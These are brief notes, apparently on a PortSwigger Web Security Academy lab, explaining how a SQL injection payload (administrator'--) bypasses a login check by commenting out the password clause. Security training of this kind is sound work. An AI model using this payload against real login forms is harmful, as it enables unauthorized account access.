SQL injection vulnerability allowing login bypass
https://portswigger.net/web-security/sql-injection/lab-login-bypass

Username
Password
Username
Password


Last updated
https://portswigger.net/web-security/sql-injection/lab-login-bypass



Last updated
SELECT username FROM users WHERE username = 'test' AND password = 'test'SELECT username FROM users WHERE username = 'administrator'--' AND passsword = 'password'
## Queried part:
SELECT username FROM users WHERE username = 'administrator'
## Commented part:
' AND passsword = 'password'